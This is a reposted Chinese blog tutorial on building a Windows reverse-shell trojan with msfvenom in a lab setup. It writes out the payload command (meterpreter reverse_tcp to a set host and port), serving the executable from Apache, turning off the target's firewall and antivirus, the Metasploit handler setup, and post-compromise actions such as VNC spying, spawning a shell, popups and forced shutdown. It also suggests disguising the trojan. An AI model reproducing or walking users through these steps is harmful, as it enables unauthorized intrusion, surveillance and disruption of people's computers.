0


网络安全-木马入侵windows -msfvenom反弹shell(CMD)

网络安全-木马入侵windows -msfvenom反弹shell(CMD)

前言一,我也是初学者记录的笔记二,可能有错误的地方,请谨慎三,欢迎各路大神指教四,任何文章仅作为学习使用五,学习网络安全知识请勿适用于违法行为学习网络安全知识请勿适用于违法行为学习网络安全知识请勿适用于违法行为学习网络安全知识请勿适用于违法行为学习网络安全知识请勿适用于违法行为重要的事情说几次玩出事了,无论你做了几层NAT几层代理,都能抓到你相信中央相信党,犯罪没有好下场

需要做什么呢

使用kali制作木马,利用木马拿到windows主机shell(cmd)

漏洞与木马的区别在于
漏洞是某个系统某个框架,才能用
特定的环境下才可以
但是木马是全部机器都可以用
因为木马相当于软件
如果你电脑不能安装软件那你这个电脑也没啥用

制作木马

还是msf工具,漏洞框架-kali

本次攻击设备为kali,设备IP为192.168.248.136
本次被攻击设备为win10,设备IP为192.168.248.134

使用msfvenom来生成木马
└─#msfvenomError:NooptionsMsfVenom-aMetasploitstandalonepayloadgenerator.Alsoareplacementformsfpayloadandmsfencode.Usage:/usr/bin/msfvenom[options]<var=val>Example:/usr/bin/msfvenom-pwindows/meterpreter/reverse_tcpLHOST=<IP>-fexe-opayload.exeOptions:-l,--list<type>Listallmodulesfor[type].Typesare:payloads,encoders,nops,platforms,archs,encrypt,formats,all-p,--payload<payload>Payloadtouse(--listpayloadstolist,--list-optionsforarguments).Specify'-'orSTDINforcustom--list-optionsList--payload<value>'sstandard,advancedandevasionoptions-f,--format<format>Outputformat(use--listformatstolist)-e,--encoder<encoder>Theencodertouse(use--listencoderstolist)--service-name<value>Theservicenametousewhengeneratingaservicebinary--sec-name<value>ThenewsectionnametousewhengeneratinglargeWindowsbinaries.Default:random4-characteralphastring--smallestGeneratethesmallestpossiblepayloadusingallavailableencoders--encrypt<value>Thetypeofencryptionorencodingtoapplytotheshellcode(use--listencrypttolist)--encrypt-key<value>Akeytobeusedfor--encrypt--encrypt-iv<value>Aninitializationvectorfor--encrypt-a,--arch<arch>Thearchitecturetousefor--payloadand--encoders(use--listarchstolist)--platform<platform>Theplatformfor--payload(use--listplatformstolist)-o,--out<path>Savethepayloadtoafile-b,--bad-chars<list>Characterstoavoidexample:'\x00\xff'-n,--nopsled<length>Prependanopsledof[length]sizeontothepayload--pad-nopsUsenopsledsizespecifiedby-n<length>asthetotalpayloadsize,auto-prependinganopsledofquantity(nopsminuspayloadlength)-s,--space<length>Themaximumsizeoftheresultingpayload--encoder-space<length>Themaximumsizeoftheencodedpayload(defaultstothe-svalue)-i,--iterations<count>Thenumberoftimestoencodethepayload-c,--add-code<path>Specifyanadditionalwin32shellcodefiletoinclude-x,--template<path>Specifyacustomexecutablefiletouseasatemplate-k,--keepPreservethe--templatebehaviourandinjectthepayloadasanewthread-v,--var-name<value>Specifyacustomvariablenametouseforcertainoutputformats-t,--timeout<second>ThenumberofsecondstowaitwhenreadingthepayloadfromSTDIN(default30,0todisable)-h,--helpShowthismessage
翻译─#msfvenom公司错误:没有选项MsfVenom-Metasploit独立有效载荷生成器。也是msfpayload和msfencode的替代品。用法:/usr/bin/msfvenom[options]<var=val>示例:/usr/bin/msfvenom-pwindows/meterpreter/reverse_tcpLHOST=<IP>-fexe-opayload.exe选项:-l、--list<type>列出[type]的所有模块。类型包括:有效载荷、编码器、nop、平台、arch、加密、格式、所有-p、--payload<payload>要使用的有效负载(--list要列出的有效负载,--list参数选项)。为自定义指定“-”或STDIN--listoptions列表--payload<value>的标准、高级和回避选项-f、--format<format>输出格式(使用--list格式列出)-e、--encoder<encoder>要使用的编码器(使用--list编码器列出)--servicename<value>生成服务二进制文件时要使用的服务名称--sec-name<value>生成大型Windows二进制文件时要使用的新节名。默认值:随机4字符字母字符串--最小使用所有可用编码器生成最小可能的有效负载--encrypt<value>要应用于外壳代码的加密或编码类型(使用--listencrypttolist)--encryptkey<value>用于--encrypt的密钥--encryptiv<value>--encrypt的初始化向量-a、--arch<arch>用于--payload和--encoder的体系结构(使用--list-archs列出)--platform<platform>--payload的平台(使用--listplatforms列出)-o、--out<path>将有效负载保存到文件-b、--要避免的坏字符<list>字符:“\x00\xff”-n、--nopslid<length>将[length]大小的nopslide预先发送到有效负载--padnops使用-n<length>指定的nopsleed大小作为总有效载荷大小,自动预处理nopslee数量(nops减去有效载荷长度)-s、--space<length>生成的有效负载的最大大小--编码器空间<length>编码有效载荷的最大大小(默认为-s值)-i、--iterations<count>编码有效负载的次数-c、--addcode<path>指定要包含的其他win32shellcode文件-x、--template<path>指定要用作模板的自定义可执行文件-k、--keep保留--template行为并将有效负载作为新线程注入-v、--varname<value>指定用于某些输出格式的自定义变量名-t、--timeout<second>从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用)-h、--help显示此消息
msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.248.136lport=1234-fexe>muma.exe
这个解释一下
msfvenom 生成木马
-p 这个的意思是 payload,意思是攻击载荷,简单的说,生成怎么样的攻击模块
windows不用解释了吧
meterpreter/reverse_tcp   反弹shell的意思,就是提权的意思
lhost=本地IP
lport=本地端口
-f 输出格式 例如苹果的MAC你就要输出的是dmg的格式
exe是windows的软件方式
>muma.exe 生成软件为muma.exe

在这里插入图片描述
在这里插入图片描述

木马已经制作好了,那么现在需要让这个(被攻击的)去下砸,不然为什么叫木马呢,木马就是伪装成正常程序的软件,所以实战中可以这个自己加上图标什么的,装一下,不然咋下载呢

把木马放到apache下,然后windows才能访问才能下载

cpmuma.exe/var/www/html/把这个复制到网站服务器下面去

在这里插入图片描述

开启服务serviceapache2start

在这里插入图片描述

由于是学习!!!,所以没有在里面做免杀
直接放进去就会给干掉了
所以需要在受攻击是设备手动关闭防火墙

在这里插入图片描述

在浏览器输入攻击机的IP/muma.txt就会自动下载我这里的是192.168.248.136/muma.txt

在这里插入图片描述
还有个杀毒要关,忘记了
在这里插入图片描述
在这里插入图片描述
这回就可以了,然后运行起来

kali

然后进入msfconsole,监听windows

useexploit/multi/handler绑定攻击模块

exploit是攻击模块,后面这个是他路径下的一个攻击模块
具体的msf的解释可以看这篇,也是我写的

https://blog.csdn.net/weixin_48137911/article/details/129052485?spm=1001.2014.3001.5501

在这里插入图片描述

setpayloadwindows/meterpreter/reverse_tcp使用攻击模块

在这里插入图片描述

setlhost192.168.248.136设置本机ip为攻击ipsetlport1234设置监听端口

在这里插入图片描述

然后就可以run执行了
在这里插入图片描述
攻击成功
开个vnc监控先
在这里插入图片描述
在这里插入图片描述
执行监控之后,在被攻击的设备上的屏幕就会自动传输过来了

shell

在这里插入图片描述
输入shell
成功反弹cmd,攻破系统,拿到权限

看到有乱码了

chap65001

让他兼容适应不乱码

拿到shell之后想干啥干啥

一个小弹窗

在这里插入图片描述
直接跟他弹桌面了

拿到shell之后
mshta javascript:confirm(“内容”);windwos.close()

再比如
我关他的电脑

shutdown /s

一分钟倒计时关机,而且不可以取消

你们爱干啥干啥哈~
在这里插入图片描述
我的杀毒软件
奇安信天守
下载的时候直接找出来了,也不让我下载。
所以你们平时下载的软件时候报警的那些还是看看叭~学着学着就知道的了


本文转载自: https://blog.csdn.net/weixin_48137911/article/details/129106735
版权归原作者 CCIE-Yasuo 所有, 如有侵权,请联系我们删除。

“网络安全-木马入侵windows -msfvenom反弹shell(CMD)”的评论:

还没有评论